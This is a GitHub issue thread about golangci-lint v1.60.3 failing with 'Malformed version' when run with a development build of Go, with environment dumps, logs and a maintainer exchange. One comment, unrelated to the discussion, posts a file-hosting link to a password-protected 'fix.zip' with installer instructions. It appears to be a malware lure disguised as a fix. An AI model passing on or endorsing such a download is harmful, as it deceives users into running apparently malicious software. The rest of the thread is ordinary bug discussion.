### ISSUE TITLE
Error: can't load config: Malformed version:

### ISSUE THREAD

**Issue by jdemeyer** [golangci/golangci-lint#4958]
### Welcome

- [X] Yes, I'm using a binary release within 2 latest [releases](https://github.com/golangci/golangci-lint/releases). Only such installations are supported.
- [X] Yes, I've searched similar [issues on GitHub](https://github.com/golangci/golangci-lint/issues) and didn't find any.
- [X] Yes, I've read the `typecheck` section of the [FAQ](https://golangci-lint.run/welcome/faq/#why-do-you-have-typecheck-errors).
- [X] Yes, I've tried with the standalone [linter](https://golangci-lint.run/usage/linters/) if available (e.g., gocritic, go vet, etc.).
- [X] I agree to follow this project's [Code of Conduct](https://github.com/golangci/golangci-lint?tab=coc-ov-file)

### Description of the problem

After upgrading `golangci-lint` from 1.60.2 to 1.60.3 it fails to run, regardless of where it's run (the error seems to occur before even parsing `go.mod` or any Go files).

It fails with the following output:
```
$ golangci-lint run
Error: can't load config: Malformed version: 
Failed executing command with error: can't load config: Malformed version:
```

Most likely, the cause is that I'm running a development version of Go and the new version detection logic can't handle this.
```
$ go version
go version devel go1.24-e705a2d Wed Aug 7 01:16:42 2024 +0000 linux/amd64
```

### Version of golangci-lint

<details>

```console
$ golangci-lint --version
golangci-lint has version v1.60.3 built with devel go1.24-e705a2d Wed Aug 7 01:16:42 2024 +0000 from (unknown, modified: ?, mod sum: "h1:l38A5de24ZeDlcFF+EB7m3W5joPD99/hS5SIHJPyZa0=") on (unknown)
```

</details>

### Configuration

<details>

Nothing specific

</details>

### Go environment

<details>

```console
$ go version && go env
go version devel go1.24-e705a2d Wed Aug 7 01:16:42 2024 +0000 linux/amd64
GO111MODULE='on'
GOARCH='amd64'
GOBIN='/home/jdemeyer/.local/bin'
GOCACHE='/home/jdemeyer/.cache/go-build'
GOENV='/home/jdemeyer/.config/go/env'
GOEXE=''
GOEXPERIMENT=''
GOFLAGS=''
GOHOSTARCH='amd64'
GOHOSTOS='linux'
GOINSECURE=''
GOMODCACHE='/home/jdemeyer/go/pkg/mod'
GONOPROXY='bitbucket.org/be-mobile'
GONOSUMDB='bitbucket.org/be-mobile'
GOOS='linux'
GOPATH='/home/jdemeyer/go'
GOPRIVATE='bitbucket.org/be-mobile'
GOPROXY='https://proxy.golang.org,direct'
GOROOT='/snap/go/10683'
GOSUMDB='sum.golang.org'
GOTMPDIR=''
GOTOOLCHAIN='local'
GOTOOLDIR='/snap/go/10683/pkg/tool/linux_amd64'
GOVCS=''
GOVERSION='devel go1.24-e705a2d Wed Aug 7 01:16:42 2024 +0000'
GODEBUG=''
GOTELEMETRY='local'
GOTELEMETRYDIR='/home/jdemeyer/.config/go/telemetry'
GCCGO='gccgo'
GOAMD64='v3'
AR='ar'
CC='gcc'
CXX='g++'
CGO_ENABLED='1'
GOMOD='/tmp/foo/go.mod'
GOWORK=''
CGO_CFLAGS='-O2 -g'
CGO_CPPFLAGS=''
CGO_CXXFLAGS='-O2 -g'
CGO_FFLAGS='-O2 -g'
CGO_LDFLAGS='-O2 -g'
PKG_CONFIG='pkg-config'
GOGCCFLAGS='-fPIC -m64 -pthread -Wl,--no-gc-sections -fmessage-length=0 -ffile-prefix-map=/tmp/go-build1244184231=/tmp/go-build -gno-record-gcc-switches'
```

</details>

### Verbose output of running

<details>

```console
$ golangci-lint cache clean
$ golangci-lint run -v
INFO golangci-lint has version v1.60.3 built with devel go1.24-e705a2d Wed Aug 7 01:16:42 2024 +0000 from (unknown, modified: ?, mod sum: "h1:l38A5de24ZeDlcFF+EB7m3W5joPD99/hS5SIHJPyZa0=") on (unknown) 
INFO [config_reader] Config search paths: [./ /tmp/foo /tmp / /home/jdemeyer] 
Error: can't load config: Malformed version: 
Failed executing command with error: can't load config: Malformed version: 
```

</details>

### A minimal reproducible example or link to a public repository

<details>

The error occurs before even parsing `go.mod` or any `.go` files, so it's reproducible from *any* directory (I tested with an empty directory `/tmp/foo`)

</details>

### Validation

- [X] Yes, I've included all information above (version, config, etc.).

### Supporter

- [ ] I am a sponsor/backer through [GitHub](https://github.com/sponsors/golangci/) or [OpenCollective](https://opencollective.com/golangci-lint)

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ldez** [comment]
Before going further, I would like to say that golangci-lint is not designed to run with devel Go version.
go1.23 (the current stable) is the upper limit.

**Comment by ldez** [comment]
Why are you using devel version of Go?

**Comment by jdemeyer** [comment]
I'm not asking for any kind of official support or guarantees for devel versions, I'm only asking to fix a really small issue which prevents any possibility of using a devel version.

It's entirely normal that a specific linter or dependency like https://pkg.go.dev/honnef.co/go/tools doesn't support devel versions, I'm not complaining about that. However, I see no reason why `golangci-lint` would refuse a fix for this (just out of principle?). In this case, v1.60.2 worked perfectly fine with the devel version but v1.60.3 no longer does.

> No one should use the devel version in production.

If it makes you feel better, I'm not doing this in production.

**Comment by jdemeyer** [comment]
> Why are you using devel version of Go?

I'm following Go development and I like to experiment with new Go features before they are officially released. Knowing where Go is heading in the future can sometimes influence choices in code you write today (for example, one can already implement range-over-function iterators in older Go versions, even though the actual `for` syntax doesn't work yet).

Also, it allows for testing that there are no breaking changes with the next Go version.
